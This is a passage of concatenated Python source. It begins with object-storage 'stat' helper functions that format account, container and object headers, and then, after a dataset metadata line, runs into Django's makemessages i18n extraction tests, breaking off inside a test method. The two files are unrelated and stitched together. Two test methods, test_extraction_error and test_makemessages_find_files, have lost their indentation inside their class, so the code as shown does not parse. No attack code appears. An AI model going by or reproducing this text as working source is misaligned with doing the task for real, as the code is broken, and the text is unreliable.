        count_key = POLICY_HEADER_PREFIX + policy + '-container-count'
        if count_key in headers:
            items.append(
                ('Containers in policy "' + policy + '"',
                 prt_bytes(headers[count_key], options['human']).lstrip())
            )
        items.append(
            ('Objects in policy "' + policy + '"',
             prt_bytes(
                 headers.get(
                     POLICY_HEADER_PREFIX + policy + '-object-count', 0),
                 options['human']
             ).lstrip())
        )
        items.append(
            ('Bytes in policy "' + policy + '"',
             prt_bytes(
                 headers.get(
                     POLICY_HEADER_PREFIX + policy + '-bytes-used', 0),
                 options['human']
             ).lstrip())
        )

    return items, headers
def print_account_stats(items, headers, output_manager):
    """Append the remaining account headers to *items* and print them
    aligned on the widest label."""
    policy_headers = [name for name in headers
                      if name.lower().startswith(POLICY_HEADER_PREFIX)]
    skip = [
        'content-length', 'date',
        'x-account-container-count',
        'x-account-object-count',
        'x-account-bytes-used',
    ] + policy_headers
    items.extend(headers_to_items(
        headers, meta_prefix='x-account-meta-', exclude_headers=skip))

    # line up the items nicely
    offset = max(len(label) for label, _ in items)
    output_manager.print_items(items, offset=offset)
def stat_container(conn, options, container):
    """HEAD a container and build (label, value) stat pairs.

    Returns a tuple of (items, headers).
    """
    req_headers = split_request_headers(options.get('header', []))
    headers = conn.head_container(container, headers=req_headers)

    items = []
    if options['verbose'] > 1:
        items.append(('URL', '%s/%s' % (conn.url, container)))
        items.append(('Auth Token', conn.token))

    object_count = prt_bytes(
        headers.get('x-container-object-count', 0),
        options['human']).lstrip()
    bytes_used = prt_bytes(headers.get('x-container-bytes-used', 0),
                           options['human']).lstrip()
    for pair in (
            ('Account', conn.url.rsplit('/', 1)[-1]),
            ('Container', container),
            ('Objects', object_count),
            ('Bytes', bytes_used),
            ('Read ACL', headers.get('x-container-read', '')),
            ('Write ACL', headers.get('x-container-write', '')),
            ('Sync To', headers.get('x-container-sync-to', '')),
            ('Sync Key', headers.get('x-container-sync-key', ''))):
        items.append(pair)
    return items, headers
def print_container_stats(items, headers, output_manager):
    """Append the remaining container headers to *items* and print them
    aligned on the widest label."""
    skip = (
        'content-length', 'date',
        'x-container-object-count',
        'x-container-bytes-used',
        'x-container-read',
        'x-container-write',
        'x-container-sync-to',
        'x-container-sync-key'
    )
    items.extend(headers_to_items(
        headers, meta_prefix='x-container-meta-', exclude_headers=skip))

    # line up the items nicely
    offset = max(len(label) for label, _ in items)
    output_manager.print_items(items, offset=offset)
def stat_object(conn, options, container, obj):
    """HEAD an object (optionally a specific version) and build
    (label, value) stat pairs.

    Returns a tuple of (items, headers).
    """
    req_headers = split_request_headers(options.get('header', []))
    version = options.get('version_id')
    query_string = None if version is None else 'version-id=%s' % version
    headers = conn.head_object(container, obj, headers=req_headers,
                               query_string=query_string)

    items = []
    if options['verbose'] > 1:
        items.append(('URL', '%s/%s/%s' % (conn.url, container, obj)))
        items.append(('Auth Token', conn.token))

    content_length = prt_bytes(headers.get('content-length', 0),
                               options['human']).lstrip()
    items.extend([
        ('Account', conn.url.rsplit('/', 1)[-1]),
        ('Container', container),
        ('Object', obj),
        ('Content Type', headers.get('content-type')),
        ('Content Length', content_length),
        ('Last Modified', headers.get('last-modified')),
        ('ETag', headers.get('etag')),
        ('Manifest', headers.get('x-object-manifest'))
    ])
    return items, headers
def print_object_stats(items, headers, output_manager):
    """Append the remaining object headers to *items* and print them
    aligned, skipping entries with missing values."""
    skip = (
        'content-type', 'content-length',
        'last-modified', 'etag', 'date',
        'x-object-manifest')
    items.extend(headers_to_items(
        headers, meta_prefix='x-object-meta-', exclude_headers=skip))

    # line up the items nicely
    offset = max(len(label) for label, _ in items)
    output_manager.print_items(items, offset=offset, skip_missing=True)
def headers_to_items(headers, meta_prefix='', exclude_headers=None):
    """Turn response headers into (label, value) pairs, metadata first.

    Header names starting with *meta_prefix* become ``Meta <Name>``
    labels; any name listed in *exclude_headers* is dropped entirely.
    """
    skip = exclude_headers or []
    meta_items, other_items = [], []
    for name, value in headers.items():
        if name in skip:
            continue
        if name.startswith(meta_prefix):
            meta_items.append(
                ('Meta %s' % name[len(meta_prefix):].title(), value))
        else:
            other_items.append((name.title(), value))
    return meta_items + other_items
| apache-2.0 |
coldmind/django | tests/i18n/test_extraction.py | 117 | 35075 | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
import io
import os
import re
import shutil
import time
import warnings
from unittest import SkipTest, skipUnless
from django.conf import settings
from django.core import management
from django.core.management import execute_from_command_line
from django.core.management.base import CommandError
from django.core.management.commands.makemessages import \
Command as MakeMessagesCommand
from django.core.management.utils import find_command
from django.test import SimpleTestCase, mock, override_settings
from django.test.utils import captured_stderr, captured_stdout
from django.utils import six
from django.utils._os import upath
from django.utils.encoding import force_text
from django.utils.six import StringIO
from django.utils.translation import TranslatorCommentWarning
LOCALE = 'de'
has_xgettext = find_command('xgettext')
this_directory = os.path.dirname(upath(__file__))
@skipUnless(has_xgettext, 'xgettext is mandatory for extraction tests')
class ExtractorTests(SimpleTestCase):
    """Base class for makemessages extraction tests: working-directory
    fixture plus assertion helpers over generated .po files."""

    test_dir = os.path.abspath(os.path.join(this_directory, 'commands'))
    PO_FILE = 'locale/%s/LC_MESSAGES/django.po' % LOCALE

    def setUp(self):
        # Tests chdir into test_dir; remember where we started so
        # tearDown can restore it.
        self._cwd = os.getcwd()

    def _rmrf(self, dname):
        # Safety net: refuse to delete anything outside test_dir.
        if os.path.commonprefix([self.test_dir, os.path.abspath(dname)]) != self.test_dir:
            return
        shutil.rmtree(dname)

    def rmfile(self, filepath):
        if os.path.exists(filepath):
            os.remove(filepath)

    def tearDown(self):
        os.chdir(self.test_dir)
        try:
            self._rmrf('locale/%s' % LOCALE)
        except OSError:
            pass
        os.chdir(self._cwd)

    def _run_makemessages(self, **options):
        """Run makemessages for LOCALE and return (command output, .po text)."""
        os.chdir(self.test_dir)
        out = StringIO()
        management.call_command('makemessages', locale=[LOCALE], verbosity=2,
                                stdout=out, **options)
        output = out.getvalue()
        self.assertTrue(os.path.exists(self.PO_FILE))
        with open(self.PO_FILE, 'r') as fp:
            po_contents = fp.read()
        return output, po_contents

    def _assertPoKeyword(self, keyword, expected_value, haystack, use_quotes=True):
        # Assert that `keyword "expected_value"` appears at the start of a
        # line in the PO contents (quotes added unless use_quotes=False).
        q = '"'
        if use_quotes:
            expected_value = '"%s"' % expected_value
            q = "'"
        needle = '%s %s' % (keyword, expected_value)
        expected_value = re.escape(expected_value)
        return self.assertTrue(re.search('^%s %s' % (keyword, expected_value), haystack, re.MULTILINE),
                               'Could not find %(q)s%(n)s%(q)s in generated PO file' % {'n': needle, 'q': q})

    def assertMsgId(self, msgid, haystack, use_quotes=True):
        return self._assertPoKeyword('msgid', msgid, haystack, use_quotes=use_quotes)

    def assertMsgStr(self, msgstr, haystack, use_quotes=True):
        return self._assertPoKeyword('msgstr', msgstr, haystack, use_quotes=use_quotes)

    def assertNotMsgId(self, msgid, s, use_quotes=True):
        if use_quotes:
            msgid = '"%s"' % msgid
        msgid = re.escape(msgid)
        return self.assertTrue(not re.search('^msgid %s' % msgid, s, re.MULTILINE))

    def _assertPoLocComment(self, assert_presence, po_filename, line_number, *comment_parts):
        # Build the expected gettext location comment and assert its
        # presence (or absence) in the .po file.
        with open(po_filename, 'r') as fp:
            po_contents = force_text(fp.read())
        if os.name == 'nt':
            # #: .\path\to\file.html:123
            cwd_prefix = '%s%s' % (os.curdir, os.sep)
        else:
            # #: path/to/file.html:123
            cwd_prefix = ''
        parts = ['#: ']
        parts.append(os.path.join(cwd_prefix, *comment_parts))
        if line_number is not None:
            parts.append(':%d' % line_number)
        needle = ''.join(parts)
        if assert_presence:
            return self.assertIn(needle, po_contents, '"%s" not found in final .po file.' % needle)
        else:
            return self.assertNotIn(needle, po_contents, '"%s" shouldn\'t be in final .po file.' % needle)

    def assertLocationCommentPresent(self, po_filename, line_number, *comment_parts):
        """
        self.assertLocationCommentPresent('django.po', 42, 'dirA', 'dirB', 'foo.py')

        verifies that the django.po file has a gettext-style location comment of the form

        `#: dirA/dirB/foo.py:42`

        (or `#: .\dirA\dirB\foo.py:42` on Windows)

        None can be passed for the line_number argument to skip checking of the :42 suffix part.
        """
        return self._assertPoLocComment(True, po_filename, line_number, *comment_parts)

    def assertLocationCommentNotPresent(self, po_filename, line_number, *comment_parts):
        """Check the opposite of assertLocationComment()"""
        return self._assertPoLocComment(False, po_filename, line_number, *comment_parts)

    def assertRecentlyModified(self, path):
        """
        Assert that file was recently modified (modification time was less than 10 seconds ago).
        """
        delta = time.time() - os.stat(path).st_mtime
        self.assertLess(delta, 10, "%s was recently modified" % path)

    def assertNotRecentlyModified(self, path):
        """
        Assert that file was not recently modified (modification time was more than 10 seconds ago).
        """
        delta = time.time() - os.stat(path).st_mtime
        self.assertGreater(delta, 10, "%s wasn't recently modified" % path)
class BasicExtractorTests(ExtractorTests):
    def test_comments_extractor(self):
        """Translator-prefixed comments ("Translators: ...") in Python and
        template sources are extracted; plain comments are not."""
        os.chdir(self.test_dir)
        management.call_command('makemessages', locale=[LOCALE], verbosity=0)
        self.assertTrue(os.path.exists(self.PO_FILE))
        with io.open(self.PO_FILE, 'r', encoding='utf-8') as fp:
            po_contents = fp.read()
            self.assertIn('#. Translators: This comment should be extracted', po_contents)
            self.assertNotIn('This comment should not be extracted', po_contents)
            # Comments in templates
            self.assertIn('#. Translators: Django template comment for translators', po_contents)
            self.assertIn("#. Translators: Django comment block for translators\n#. string's meaning unveiled", po_contents)
            self.assertIn('#. Translators: One-line translator comment #1', po_contents)
            self.assertIn('#. Translators: Two-line translator comment #1\n#. continued here.', po_contents)
            self.assertIn('#. Translators: One-line translator comment #2', po_contents)
            self.assertIn('#. Translators: Two-line translator comment #2\n#. continued here.', po_contents)
            self.assertIn('#. Translators: One-line translator comment #3', po_contents)
            self.assertIn('#. Translators: Two-line translator comment #3\n#. continued here.', po_contents)
            self.assertIn('#. Translators: One-line translator comment #4', po_contents)
            self.assertIn('#. Translators: Two-line translator comment #4\n#. continued here.', po_contents)
            self.assertIn('#. Translators: One-line translator comment #5 -- with non ASCII characters: áéíóúö', po_contents)
            self.assertIn('#. Translators: Two-line translator comment #5 -- with non ASCII characters: áéíóúö\n#. continued here.', po_contents)
    def test_templatize_trans_tag(self):
        """Percent characters inside {% trans %} literals are doubled (%%)
        in the extracted msgids, not treated as format specifiers."""
        # ticket #11240
        os.chdir(self.test_dir)
        management.call_command('makemessages', locale=[LOCALE], verbosity=0)
        self.assertTrue(os.path.exists(self.PO_FILE))
        with open(self.PO_FILE, 'r') as fp:
            po_contents = force_text(fp.read())
            self.assertMsgId('Literal with a percent symbol at the end %%', po_contents)
            self.assertMsgId('Literal with a percent %% symbol in the middle', po_contents)
            self.assertMsgId('Completed 50%% of all the tasks', po_contents)
            self.assertMsgId('Completed 99%% of all the tasks', po_contents)
            self.assertMsgId("Shouldn't double escape this sequence: %% (two percent signs)", po_contents)
            self.assertMsgId("Shouldn't double escape this sequence %% either", po_contents)
            self.assertMsgId("Looks like a str fmt spec %%s but shouldn't be interpreted as such", po_contents)
            self.assertMsgId("Looks like a str fmt spec %% o but shouldn't be interpreted as such", po_contents)
    def test_templatize_blocktrans_tag(self):
        """Same %% escaping guarantees for {% blocktrans %} contents."""
        # ticket #11966
        os.chdir(self.test_dir)
        management.call_command('makemessages', locale=[LOCALE], verbosity=0)
        self.assertTrue(os.path.exists(self.PO_FILE))
        with open(self.PO_FILE, 'r') as fp:
            po_contents = force_text(fp.read())
            self.assertMsgId('I think that 100%% is more that 50%% of anything.', po_contents)
            self.assertMsgId('I think that 100%% is more that 50%% of %(obj)s.', po_contents)
            self.assertMsgId("Blocktrans extraction shouldn't double escape this: %%, a=%(a)s", po_contents)
    def test_blocktrans_trimmed(self):
        """{% blocktrans trimmed %} collapses whitespace in msgids, and
        location-comment line numbers stay correct afterwards (#21406)."""
        os.chdir(self.test_dir)
        management.call_command('makemessages', locale=[LOCALE], verbosity=0)
        self.assertTrue(os.path.exists(self.PO_FILE))
        with open(self.PO_FILE, 'r') as fp:
            po_contents = force_text(fp.read())
            # should not be trimmed
            self.assertNotMsgId('Text with a few line breaks.', po_contents)
            # should be trimmed
            self.assertMsgId("Again some text with a few line breaks, this time should be trimmed.", po_contents)
        # #21406 -- Should adjust for eaten line numbers
        self.assertMsgId("I'm on line 97", po_contents)
        self.assertLocationCommentPresent(self.PO_FILE, 97, 'templates', 'test.html')
    def test_force_en_us_locale(self):
        """Value of locale-munging option used by the command is the right one"""
        # makemessages must not switch the process locale while extracting.
        self.assertTrue(MakeMessagesCommand.leave_locale_alone)
def test_extraction_error(self):
os.chdir(self.test_dir)
self.assertRaises(SyntaxError, management.call_command, 'makemessages', locale=[LOCALE], extensions=['tpl'], verbosity=0)
with self.assertRaises(SyntaxError) as context_manager:
management.call_command('makemessages', locale=[LOCALE], extensions=['tpl'], verbosity=0)
six.assertRegex(
self, str(context_manager.exception),
r'Translation blocks must not include other block tags: blocktrans \(file templates[/\\]template_with_error\.tpl, line 3\)'
)
# Check that the temporary file was cleaned up
self.assertFalse(os.path.exists('./templates/template_with_error.tpl.py'))
    def test_unicode_decode_error(self):
        """A file that is not valid UTF-8 is reported as skipped instead of
        aborting the extraction run."""
        os.chdir(self.test_dir)
        shutil.copyfile('./not_utf8.sample', './not_utf8.txt')
        self.addCleanup(self.rmfile, os.path.join(self.test_dir, 'not_utf8.txt'))
        out = StringIO()
        management.call_command('makemessages', locale=[LOCALE], stdout=out)
        self.assertIn("UnicodeDecodeError: skipped file not_utf8.txt in .",
                      force_text(out.getvalue()))
    def test_extraction_warning(self):
        """test xgettext warning about multiple bare interpolation placeholders"""
        os.chdir(self.test_dir)
        shutil.copyfile('./code.sample', './code_sample.py')
        self.addCleanup(self.rmfile, os.path.join(self.test_dir, 'code_sample.py'))
        out = StringIO()
        management.call_command('makemessages', locale=[LOCALE], stdout=out)
        # The emitted warning should name the offending file and line.
        self.assertIn("code_sample.py:4", force_text(out.getvalue()))
    def test_template_message_context_extractor(self):
        """
        Ensure that message contexts are correctly extracted for the
        {% trans %} and {% blocktrans %} template tags.
        Refs #14806.
        """
        os.chdir(self.test_dir)
        management.call_command('makemessages', locale=[LOCALE], verbosity=0)
        self.assertTrue(os.path.exists(self.PO_FILE))
        with open(self.PO_FILE, 'r') as fp:
            po_contents = force_text(fp.read())
            # {% trans %}
            self.assertIn('msgctxt "Special trans context #1"', po_contents)
            self.assertMsgId("Translatable literal #7a", po_contents)
            self.assertIn('msgctxt "Special trans context #2"', po_contents)
            self.assertMsgId("Translatable literal #7b", po_contents)
            self.assertIn('msgctxt "Special trans context #3"', po_contents)
            self.assertMsgId("Translatable literal #7c", po_contents)
            # {% blocktrans %}
            self.assertIn('msgctxt "Special blocktrans context #1"', po_contents)
            self.assertMsgId("Translatable literal #8a", po_contents)
            self.assertIn('msgctxt "Special blocktrans context #2"', po_contents)
            self.assertMsgId("Translatable literal #8b-singular", po_contents)
            self.assertIn("Translatable literal #8b-plural", po_contents)
            self.assertIn('msgctxt "Special blocktrans context #3"', po_contents)
            self.assertMsgId("Translatable literal #8c-singular", po_contents)
            self.assertIn("Translatable literal #8c-plural", po_contents)
            self.assertIn('msgctxt "Special blocktrans context #4"', po_contents)
            self.assertMsgId("Translatable literal #8d %(a)s", po_contents)
    def test_context_in_single_quotes(self):
        """Message contexts wrapped in either quote style are extracted."""
        os.chdir(self.test_dir)
        management.call_command('makemessages', locale=[LOCALE], verbosity=0)
        self.assertTrue(os.path.exists(self.PO_FILE))
        with open(self.PO_FILE, 'r') as fp:
            po_contents = force_text(fp.read())
            # {% trans %}
            self.assertIn('msgctxt "Context wrapped in double quotes"', po_contents)
            self.assertIn('msgctxt "Context wrapped in single quotes"', po_contents)
            # {% blocktrans %}
            self.assertIn('msgctxt "Special blocktrans context wrapped in double quotes"', po_contents)
            self.assertIn('msgctxt "Special blocktrans context wrapped in single quotes"', po_contents)
    def test_template_comments(self):
        """Template comment tags on the same line of other constructs (#19552)"""
        os.chdir(self.test_dir)
        # Test detection/end user reporting of old, incorrect templates
        # translator comments syntax
        with warnings.catch_warnings(record=True) as ws:
            warnings.simplefilter('always')
            management.call_command('makemessages', locale=[LOCALE], extensions=['thtml'], verbosity=0)
            # Exactly three old-style comments should be reported as ignored.
            self.assertEqual(len(ws), 3)
            for w in ws:
                self.assertTrue(issubclass(w.category, TranslatorCommentWarning))
            six.assertRegex(
                self, str(ws[0].message),
                r"The translator-targeted comment 'Translators: ignored i18n comment #1' \(file templates[/\\]comments.thtml, line 4\) was ignored, because it wasn't the last item on the line\."
            )
            six.assertRegex(
                self, str(ws[1].message),
                r"The translator-targeted comment 'Translators: ignored i18n comment #3' \(file templates[/\\]comments.thtml, line 6\) was ignored, because it wasn't the last item on the line\."
            )
            six.assertRegex(
                self, str(ws[2].message),
                r"The translator-targeted comment 'Translators: ignored i18n comment #4' \(file templates[/\\]comments.thtml, line 8\) was ignored, because it wasn't the last item on the line\."
            )
        # Now test .po file contents
        self.assertTrue(os.path.exists(self.PO_FILE))
        with open(self.PO_FILE, 'r') as fp:
            po_contents = force_text(fp.read())
            self.assertMsgId('Translatable literal #9a', po_contents)
            self.assertNotIn('ignored comment #1', po_contents)
            self.assertNotIn('Translators: ignored i18n comment #1', po_contents)
            self.assertMsgId("Translatable literal #9b", po_contents)
            self.assertNotIn('ignored i18n comment #2', po_contents)
            self.assertNotIn('ignored comment #2', po_contents)
            self.assertMsgId('Translatable literal #9c', po_contents)
            self.assertNotIn('ignored comment #3', po_contents)
            self.assertNotIn('ignored i18n comment #3', po_contents)
            self.assertMsgId('Translatable literal #9d', po_contents)
            self.assertNotIn('ignored comment #4', po_contents)
            self.assertMsgId('Translatable literal #9e', po_contents)
            self.assertNotIn('ignored comment #5', po_contents)
            self.assertNotIn('ignored i18n comment #4', po_contents)
            self.assertMsgId('Translatable literal #9f', po_contents)
            self.assertIn('#. Translators: valid i18n comment #5', po_contents)
            self.assertMsgId('Translatable literal #9g', po_contents)
            self.assertIn('#. Translators: valid i18n comment #6', po_contents)
            self.assertMsgId('Translatable literal #9h', po_contents)
            self.assertIn('#. Translators: valid i18n comment #7', po_contents)
            self.assertMsgId('Translatable literal #9i', po_contents)
            six.assertRegex(self, po_contents, r'#\..+Translators: valid i18n comment #8')
            six.assertRegex(self, po_contents, r'#\..+Translators: valid i18n comment #9')
            self.assertMsgId("Translatable literal #9j", po_contents)
def test_makemessages_find_files(self):
"""
Test that find_files only discover files having the proper extensions.
"""
cmd = MakeMessagesCommand()
cmd.ignore_patterns = ['CVS', '.*', '*~', '*.pyc']
cmd.symlinks = False
cmd.domain = 'django'
cmd.extensions = ['html', 'txt', 'py']
cmd.verbosity = 0
cmd.locale_paths = []
cmd.default_locale_path = os.path.join(self.test_dir, 'locale')
found_files = cmd.find_files(self.test_dir)
found_exts = set([os.path.splitext(tfile.file)[1] for tfile in found_files])
self.assertEqual(found_exts.difference({'.py', '.html', '.txt'}), set())
cmd.extensions = ['js']
cmd.domain = 'djangojs'
found_files = cmd.find_files(self.test_dir)
found_exts = set([os.path.splitext(tfile.file)[1] for tfile in found_files])
self.assertEqual(found_exts.difference({'.js'}), set())
    @mock.patch('django.core.management.commands.makemessages.popen_wrapper')
    def test_makemessages_gettext_version(self, mocked_popen_wrapper):
        """gettext_version is parsed out of `xgettext --version` output
        (both 3-part and 2-part version numbers); unparseable output
        raises CommandError."""
        # "Normal" output:
        mocked_popen_wrapper.return_value = (
            "xgettext (GNU gettext-tools) 0.18.1\n"
            "Copyright (C) 1995-1998, 2000-2010 Free Software Foundation, Inc.\n"
            "License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\n"
            "This is free software: you are free to change and redistribute it.\n"
            "There is NO WARRANTY, to the extent permitted by law.\n"
            "Written by Ulrich Drepper.\n", '', 0)
        # A fresh command instance is built before each check -- presumably
        # gettext_version is cached per instance; TODO confirm.
        cmd = MakeMessagesCommand()
        self.assertEqual(cmd.gettext_version, (0, 18, 1))
        # Version number with only 2 parts (#23788)
        mocked_popen_wrapper.return_value = (
            "xgettext (GNU gettext-tools) 0.17\n", '', 0)
        cmd = MakeMessagesCommand()
        self.assertEqual(cmd.gettext_version, (0, 17))
        # Bad version output
        mocked_popen_wrapper.return_value = (
            "any other return value\n", '', 0)
        cmd = MakeMessagesCommand()
        with six.assertRaisesRegex(self, CommandError, "Unable to get gettext version. Is it installed?"):
            cmd.gettext_version
    def test_po_file_encoding_when_updating(self):
        """Update of PO file doesn't corrupt it with non-UTF-8 encoding on Python3+Windows (#23271)"""
        BR_PO_BASE = 'locale/pt_BR/LC_MESSAGES/django'
        os.chdir(self.test_dir)
        # Start from a known-good catalog containing non-ASCII msgstrs.
        shutil.copyfile(BR_PO_BASE + '.pristine', BR_PO_BASE + '.po')
        self.addCleanup(self.rmfile, os.path.join(self.test_dir, 'locale', 'pt_BR', 'LC_MESSAGES', 'django.po'))
        management.call_command('makemessages', locale=['pt_BR'], verbosity=0)
        self.assertTrue(os.path.exists(self.PO_FILE))
        # Read back as UTF-8; a corrupting re-encode would break this read
        # or the msgstr assertion below.
        with io.open(BR_PO_BASE + '.po', 'r', encoding='utf-8') as fp:
            po_contents = force_text(fp.read())
            self.assertMsgStr("Größe", po_contents)
class JavascriptExtractorTests(ExtractorTests):
    """makemessages extraction from JavaScript sources (djangojs domain)."""
    PO_FILE = 'locale/%s/LC_MESSAGES/djangojs.po' % LOCALE
    def test_javascript_literals(self):
        """Every translatable literal in the JS fixtures lands in the catalog."""
        os.chdir(self.test_dir)
        _, po_contents = self._run_makemessages(domain='djangojs')
        self.assertMsgId('This literal should be included.', po_contents)
        self.assertMsgId('gettext_noop should, too.', po_contents)
        self.assertMsgId('This one as well.', po_contents)
        self.assertMsgId(r'He said, \"hello\".', po_contents)
        self.assertMsgId("okkkk", po_contents)
        self.assertMsgId("TEXT", po_contents)
        self.assertMsgId("It's at http://example.com", po_contents)
        self.assertMsgId("String", po_contents)
        self.assertMsgId("/* but this one will be too */ 'cause there is no way of telling...", po_contents)
        self.assertMsgId("foo", po_contents)
        self.assertMsgId("bar", po_contents)
        self.assertMsgId("baz", po_contents)
        self.assertMsgId("quz", po_contents)
        self.assertMsgId("foobar", po_contents)
    @override_settings(
        STATIC_ROOT=os.path.join(this_directory, 'commands', 'static/'),
        MEDIA_ROOT=os.path.join(this_directory, 'commands', 'media_root/'))
    def test_media_static_dirs_ignored(self):
        """STATIC_ROOT/MEDIA_ROOT contents are skipped (regression for #23583)."""
        _, po_contents = self._run_makemessages(domain='djangojs')
        self.assertMsgId("Static content inside app should be included.", po_contents)
        self.assertNotMsgId("Content from STATIC_ROOT should not be included", po_contents)
    @override_settings(STATIC_ROOT=None, MEDIA_ROOT='')
    def test_default_root_settings(self):
        """Extraction works with unset/empty root settings (regression for #23717)."""
        _, po_contents = self._run_makemessages(domain='djangojs')
        self.assertMsgId("Static content inside app should be included.", po_contents)
class IgnoredExtractorTests(ExtractorTests):
    """--ignore pattern handling of makemessages: directories, subdirectories,
    file patterns, and the implicit STATIC_ROOT/MEDIA_ROOT exclusion."""
    def test_ignore_directory(self):
        out, po_contents = self._run_makemessages(ignore_patterns=[
            os.path.join('ignore_dir', '*'),
        ])
        self.assertIn("ignoring directory ignore_dir", out)
        self.assertMsgId('This literal should be included.', po_contents)
        self.assertNotMsgId('This should be ignored.', po_contents)
    def test_ignore_subdirectory(self):
        out, po_contents = self._run_makemessages(ignore_patterns=[
            'templates/*/ignore.html',
            'templates/subdir/*',
        ])
        self.assertIn("ignoring directory subdir", out)
        self.assertNotMsgId('This subdir should be ignored too.', po_contents)
    def test_ignore_file_patterns(self):
        out, po_contents = self._run_makemessages(ignore_patterns=[
            'xxx_*',
        ])
        self.assertIn("ignoring file xxx_ignored.html", out)
        self.assertNotMsgId('This should be ignored too.', po_contents)
    @override_settings(
        STATIC_ROOT=os.path.join(this_directory, 'commands', 'static/'),
        MEDIA_ROOT=os.path.join(this_directory, 'commands', 'media_root/'))
    def test_media_static_dirs_ignored(self):
        # No explicit --ignore here: these roots are skipped automatically.
        out, _ = self._run_makemessages()
        self.assertIn("ignoring directory static", out)
        self.assertIn("ignoring directory media_root", out)
class SymlinkExtractorTests(ExtractorTests):
    """makemessages --symlinks: templates reached through a symlinked
    directory are extracted and reported under the symlinked path."""
    def setUp(self):
        super(SymlinkExtractorTests, self).setUp()
        self.symlinked_dir = os.path.join(self.test_dir, 'templates_symlinked')
    def tearDown(self):
        super(SymlinkExtractorTests, self).tearDown()
        os.chdir(self.test_dir)
        try:
            os.remove(self.symlinked_dir)
        except OSError:
            # The symlink may not exist if the test was skipped.
            pass
        os.chdir(self._cwd)
    def test_symlink(self):
        # On Python < 3.2 os.symlink() exists only on Unix
        if hasattr(os, 'symlink'):
            if os.path.exists(self.symlinked_dir):
                self.assertTrue(os.path.islink(self.symlinked_dir))
            else:
                # On Python >= 3.2 os.symlink() exists always but then can
                # fail at runtime when user hasn't the needed permissions on
                # Windows versions that support symbolic links (>= 6/Vista).
                # See Python issue 9333 (http://bugs.python.org/issue9333).
                # Skip the test in that case
                try:
                    os.symlink(os.path.join(self.test_dir, 'templates'), self.symlinked_dir)
                except (OSError, NotImplementedError):
                    raise SkipTest("os.symlink() is available on this OS but can't be used by this user.")
            os.chdir(self.test_dir)
            management.call_command('makemessages', locale=[LOCALE], verbosity=0, symlinks=True)
            self.assertTrue(os.path.exists(self.PO_FILE))
            with open(self.PO_FILE, 'r') as fp:
                po_contents = force_text(fp.read())
                self.assertMsgId('This literal should be included.', po_contents)
                # Location comments must reference the symlinked path.
                self.assertIn('templates_symlinked/test.html', po_contents)
class CopyPluralFormsExtractorTests(ExtractorTests):
    """Plural-Forms header handling when generating .po files."""
    PO_FILE_ES = 'locale/es/LC_MESSAGES/django.po'
    def tearDown(self):
        super(CopyPluralFormsExtractorTests, self).tearDown()
        os.chdir(self.test_dir)
        try:
            self._rmrf('locale/es')
        except OSError:
            pass
        os.chdir(self._cwd)
    def test_copy_plural_forms(self):
        """The Plural-Forms header is copied from Django's own catalogs."""
        os.chdir(self.test_dir)
        management.call_command('makemessages', locale=[LOCALE], verbosity=0)
        self.assertTrue(os.path.exists(self.PO_FILE))
        with open(self.PO_FILE, 'r') as fp:
            po_contents = force_text(fp.read())
            self.assertIn('Plural-Forms: nplurals=2; plural=(n != 1)', po_contents)
    def test_override_plural_forms(self):
        """Ticket #20311: exactly one Plural-Forms header ends up in the file."""
        os.chdir(self.test_dir)
        management.call_command('makemessages', locale=['es'], extensions=['djtpl'], verbosity=0)
        self.assertTrue(os.path.exists(self.PO_FILE_ES))
        with io.open(self.PO_FILE_ES, 'r', encoding='utf-8') as fp:
            po_contents = fp.read()
            found = re.findall(r'^(?P<value>"Plural-Forms.+?\\n")\s*$', po_contents, re.MULTILINE | re.DOTALL)
            self.assertEqual(1, len(found))
class NoWrapExtractorTests(ExtractorTests):
    """Behavior of the --no-wrap option: with it, long msgids stay on one
    line; without it, xgettext wraps them across continuation lines."""
    def _read_po_contents(self):
        # Read the freshly generated catalog from disk as text.
        with open(self.PO_FILE, 'r') as fp:
            return force_text(fp.read())
    def test_no_wrap_enabled(self):
        os.chdir(self.test_dir)
        management.call_command('makemessages', locale=[LOCALE], verbosity=0, no_wrap=True)
        self.assertTrue(os.path.exists(self.PO_FILE))
        po_contents = self._read_po_contents()
        self.assertMsgId('This literal should also be included wrapped or not wrapped depending on the use of the --no-wrap option.', po_contents)
    def test_no_wrap_disabled(self):
        os.chdir(self.test_dir)
        management.call_command('makemessages', locale=[LOCALE], verbosity=0, no_wrap=False)
        self.assertTrue(os.path.exists(self.PO_FILE))
        po_contents = self._read_po_contents()
        self.assertMsgId('""\n"This literal should also be included wrapped or not wrapped depending on the "\n"use of the --no-wrap option."', po_contents, use_quotes=False)
class LocationCommentsTests(ExtractorTests):
    """Presence/absence of '#: file:line' location comments (--no-location)."""
    def test_no_location_enabled(self):
        """Behavior is correct if --no-location switch is specified. See #16903."""
        os.chdir(self.test_dir)
        management.call_command('makemessages', locale=[LOCALE], verbosity=0, no_location=True)
        self.assertTrue(os.path.exists(self.PO_FILE))
        self.assertLocationCommentNotPresent(self.PO_FILE, 55, 'templates', 'test.html.py')
    def test_no_location_disabled(self):
        """Behavior is correct if --no-location switch isn't specified."""
        os.chdir(self.test_dir)
        management.call_command('makemessages', locale=[LOCALE], verbosity=0, no_location=False)
        self.assertTrue(os.path.exists(self.PO_FILE))
        # #16903 -- Standard comment with source file relative path should be present
        self.assertLocationCommentPresent(self.PO_FILE, 55, 'templates', 'test.html')
        # #21208 -- Leaky paths in comments on Windows e.g. #: path\to\file.html.py:123
        self.assertLocationCommentNotPresent(self.PO_FILE, None, 'templates', 'test.html.py')
class KeepPotFileExtractorTests(ExtractorTests):
    """Behavior of the --keep-pot option of makemessages: the intermediate
    .pot file is removed unless keep_pot=True is passed."""
    POT_FILE = 'locale/django.pot'
    # NOTE: the redundant setUp() override that only called super() was
    # removed; the inherited ExtractorTests.setUp() runs unchanged.
    def tearDown(self):
        super(KeepPotFileExtractorTests, self).tearDown()
        os.chdir(self.test_dir)
        try:
            os.unlink(self.POT_FILE)
        except OSError:
            # The .pot file only exists after the keep_pot=True test.
            pass
        os.chdir(self._cwd)
    def test_keep_pot_disabled_by_default(self):
        os.chdir(self.test_dir)
        management.call_command('makemessages', locale=[LOCALE], verbosity=0)
        self.assertFalse(os.path.exists(self.POT_FILE))
    def test_keep_pot_explicitly_disabled(self):
        os.chdir(self.test_dir)
        management.call_command('makemessages', locale=[LOCALE], verbosity=0,
                                keep_pot=False)
        self.assertFalse(os.path.exists(self.POT_FILE))
    def test_keep_pot_enabled(self):
        os.chdir(self.test_dir)
